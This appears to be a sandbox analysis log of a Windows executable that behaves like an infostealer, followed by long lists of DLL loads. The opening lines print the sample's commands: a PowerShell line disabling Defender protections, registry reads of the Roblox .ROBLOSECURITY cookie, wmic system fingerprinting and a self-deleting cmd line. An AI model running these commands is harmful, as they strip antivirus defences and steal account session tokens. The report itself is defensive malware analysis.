                        Source: C:\Users\user\Desktop\zamPeEkHWr.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
                        Source: C:\Users\user\Desktop\zamPeEkHWr.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
                        Source: C:\Users\user\Desktop\zamPeEkHWr.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
                        Source: C:\Users\user\Desktop\zamPeEkHWr.exeProcess created: C:\Windows\System32\wbem\WMIC.exe "wmic.exe" os get Caption
                        Source: C:\Users\user\Desktop\zamPeEkHWr.exeProcess created: C:\Windows\System32\wbem\WMIC.exe "wmic.exe" computersystem get totalphysicalmemory
                        Source: C:\Users\user\Desktop\zamPeEkHWr.exeProcess created: C:\Windows\System32\wbem\WMIC.exe "wmic.exe" csproduct get uuid
                        Source: C:\Users\user\Desktop\zamPeEkHWr.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
                        Source: C:\Users\user\Desktop\zamPeEkHWr.exeProcess created: C:\Windows\System32\wbem\WMIC.exe "wmic" path win32_VideoController get name
                        Source: C:\Users\user\Desktop\zamPeEkHWr.exeProcess created: C:\Windows\System32\cmd.exe "cmd.exe" /c ping localhost && del /F /A h "C:\Users\user\Desktop\zamPeEkHWr.exe" && pause
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping localhost
                        Source: C:\Users\user\Desktop\zamPeEkHWr.exeSection loaded: mscoree.dll
                        Source: C:\Users\user\Desktop\zamPeEkHWr.exeSection loaded: apphelp.dll
                        Source: C:\Users\user\Desktop\zamPeEkHWr.exeSection loaded: kernel.appcore.dll
                        Source: C:\Users\user\Desktop\zamPeEkHWr.exeSection loaded: version.dll
                        Source: C:\Users\user\Desktop\zamPeEkHWr.exeSection loaded: vcruntime140_clr0400.dll
                        Source: C:\Users\user\Desktop\zamPeEkHWr.exeSection loaded: ucrtbase_clr0400.dll
                        Source: C:\Users\user\Desktop\zamPeEkHWr.exeSection loaded: ucrtbase_clr0400.dll
                        Source: C:\Users\user\Desktop\zamPeEkHWr.exeSection loaded: windows.storage.dll
                        Source: C:\Users\user\Desktop\zamPeEkHWr.exeSection loaded: wldp.dll
                        Source: C:\Users\user\Desktop\zamPeEkHWr.exeSection loaded: profapi.dll
                        Source: C:\Users\user\Desktop\zamPeEkHWr.exeSection loaded: cryptsp.dll
                        Source: C:\Users\user\Desktop\zamPeEkHWr.exeSection loaded: rsaenh.dll
                        Source: C:\Users\user\Desktop\zamPeEkHWr.exeSection loaded: cryptbase.dll
                        Source: C:\Users\user\Desktop\zamPeEkHWr.exeSection loaded: iphlpapi.dll
                        Source: C:\Users\user\Desktop\zamPeEkHWr.exeSection loaded: dnsapi.dll
                        Source: C:\Users\user\Desktop\zamPeEkHWr.exeSection loaded: dhcpcsvc6.dll
                        Source: C:\Users\user\Desktop\zamPeEkHWr.exeSection loaded: dhcpcsvc.dll
                        Source: C:\Users\user\Desktop\zamPeEkHWr.exeSection loaded: winnsi.dll
                        Source: C:\Users\user\Desktop\zamPeEkHWr.exeSection loaded: rasapi32.dll
                        Source: C:\Users\user\Desktop\zamPeEkHWr.exeSection loaded: rasman.dll
                        Source: C:\Users\user\Desktop\zamPeEkHWr.exeSection loaded: rtutils.dll
                        Source: C:\Users\user\Desktop\zamPeEkHWr.exeSection loaded: mswsock.dll
                        Source: C:\Users\user\Desktop\zamPeEkHWr.exeSection loaded: winhttp.dll
                        Source: C:\Users\user\Desktop\zamPeEkHWr.exeSection loaded: ondemandconnroutehelper.dll
                        Source: C:\Users\user\Desktop\zamPeEkHWr.exeSection loaded: rasadhlp.dll
                        Source: C:\Users\user\Desktop\zamPeEkHWr.exeSection loaded: fwpuclnt.dll
                        Source: C:\Users\user\Desktop\zamPeEkHWr.exeSection loaded: secur32.dll
                        Source: C:\Users\user\Desktop\zamPeEkHWr.exeSection loaded: sspicli.dll
                        Source: C:\Users\user\Desktop\zamPeEkHWr.exeSection loaded: schannel.dll
                        Source: C:\Users\user\Desktop\zamPeEkHWr.exeSection loaded: mskeyprotect.dll
                        Source: C:\Users\user\Desktop\zamPeEkHWr.exeSection loaded: ntasn1.dll
                        Source: C:\Users\user\Desktop\zamPeEkHWr.exeSection loaded: ncrypt.dll
                        Source: C:\Users\user\Desktop\zamPeEkHWr.exeSection loaded: ncryptsslp.dll
                        Source: C:\Users\user\Desktop\zamPeEkHWr.exeSection loaded: msasn1.dll
                        Source: C:\Users\user\Desktop\zamPeEkHWr.exeSection loaded: gpapi.dll
                        Source: C:\Users\user\Desktop\zamPeEkHWr.exeSection loaded: ntmarta.dll
                        Source: C:\Users\user\Desktop\zamPeEkHWr.exeSection loaded: dpapi.dll
                        Source: C:\Users\user\Desktop\zamPeEkHWr.exeSection loaded: sxs.dll
                        Source: C:\Users\user\Desktop\zamPeEkHWr.exeSection loaded: devenum.dll
                        Source: C:\Users\user\Desktop\zamPeEkHWr.exeSection loaded: winmm.dll
                        Source: C:\Users\user\Desktop\zamPeEkHWr.exeSection loaded: devobj.dll
                        Source: C:\Users\user\Desktop\zamPeEkHWr.exeSection loaded: msdmo.dll
                        Source: C:\Users\user\Desktop\zamPeEkHWr.exeSection loaded: uxtheme.dll
                        Source: C:\Users\user\Desktop\zamPeEkHWr.exeSection loaded: windowscodecs.dll
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iphlpapi.dll
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: framedynos.dll
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sspicli.dll
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: kernel.appcore.dll
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: wbemcomn.dll
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: msxml6.dll
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: urlmon.dll
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iertutil.dll
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: srvcli.dll
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: netutils.dll
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: uxtheme.dll
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140.dll
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140_1.dll
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: amsi.dll
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: userenv.dll
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: profapi.dll
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vbscript.dll
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sxs.dll
                        Source: C:\Windows\System32\attrib.exeSection loaded: ulib.dll
                        Source: C:\Windows\System32\attrib.exeSection loaded: fsutilext.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
                        Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: fastprox.dllJump to behavior
                        Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: ncobjapi.dllJump to behavior
                        Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dllJump to behavior
                        Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dllJump to behavior
                        Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: kernel.appcore.dllJump to behavior
                        Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mpclient.dllJump to behavior
                        Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: userenv.dllJump to behavior
                        Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: version.dllJump to behavior
                        Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: msasn1.dllJump to behavior
                        Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wmitomi.dllJump to behavior
                        Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mi.dllJump to behavior
                        Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dllJump to behavior
                        Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dllJump to behavior
                        Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: gpapi.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iphlpapi.dll
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: framedynos.dll
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sspicli.dll
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: kernel.appcore.dll
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: wbemcomn.dll
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: msxml6.dll
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: urlmon.dll
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iertutil.dll
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: srvcli.dll
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: netutils.dll
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: uxtheme.dll
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140.dll
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140_1.dll
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140.dll
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: amsi.dll
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: userenv.dll
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: profapi.dll
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vbscript.dll
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sxs.dll
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iphlpapi.dll
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: framedynos.dll
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sspicli.dll
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: kernel.appcore.dll
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: wbemcomn.dll
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: msxml6.dll
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: urlmon.dll
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iertutil.dll
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: srvcli.dll
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: netutils.dll
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: uxtheme.dll
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140.dll
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140_1.dll
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: amsi.dll
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: userenv.dll
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: profapi.dll
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vbscript.dll
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sxs.dll
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iphlpapi.dll
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: framedynos.dll
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sspicli.dll
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: kernel.appcore.dll
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: wbemcomn.dll
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: msxml6.dll
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: urlmon.dll
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iertutil.dll
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: srvcli.dll
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: netutils.dll
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: uxtheme.dll
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140.dll
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140_1.dll
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140.dll
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: amsi.dll
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: userenv.dll
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: profapi.dll
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vbscript.dll
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sxs.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iphlpapi.dll
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: framedynos.dll
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sspicli.dll
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: kernel.appcore.dll
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: wbemcomn.dll
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: msxml6.dll
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: urlmon.dll
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iertutil.dll
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: srvcli.dll
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: netutils.dll
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: uxtheme.dll
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140.dll
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140_1.dll
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: amsi.dll
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: userenv.dll
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: profapi.dll
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vbscript.dll
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sxs.dll
                        Source: C:\Windows\System32\PING.EXESection loaded: iphlpapi.dll
                        Source: C:\Windows\System32\PING.EXESection loaded: mswsock.dll
                        Source: C:\Windows\System32\PING.EXESection loaded: dnsapi.dll
                        Source: C:\Windows\System32\PING.EXESection loaded: rasadhlp.dll
                        Source: C:\Windows\System32\PING.EXESection loaded: fwpuclnt.dll
                        Source: C:\Windows\System32\PING.EXESection loaded: winnsi.dll
                        Source: C:\Users\user\Desktop\zamPeEkHWr.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{62BE5D10-60EB-11d0-BD3B-00A0C911CE86}\InprocServer32Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
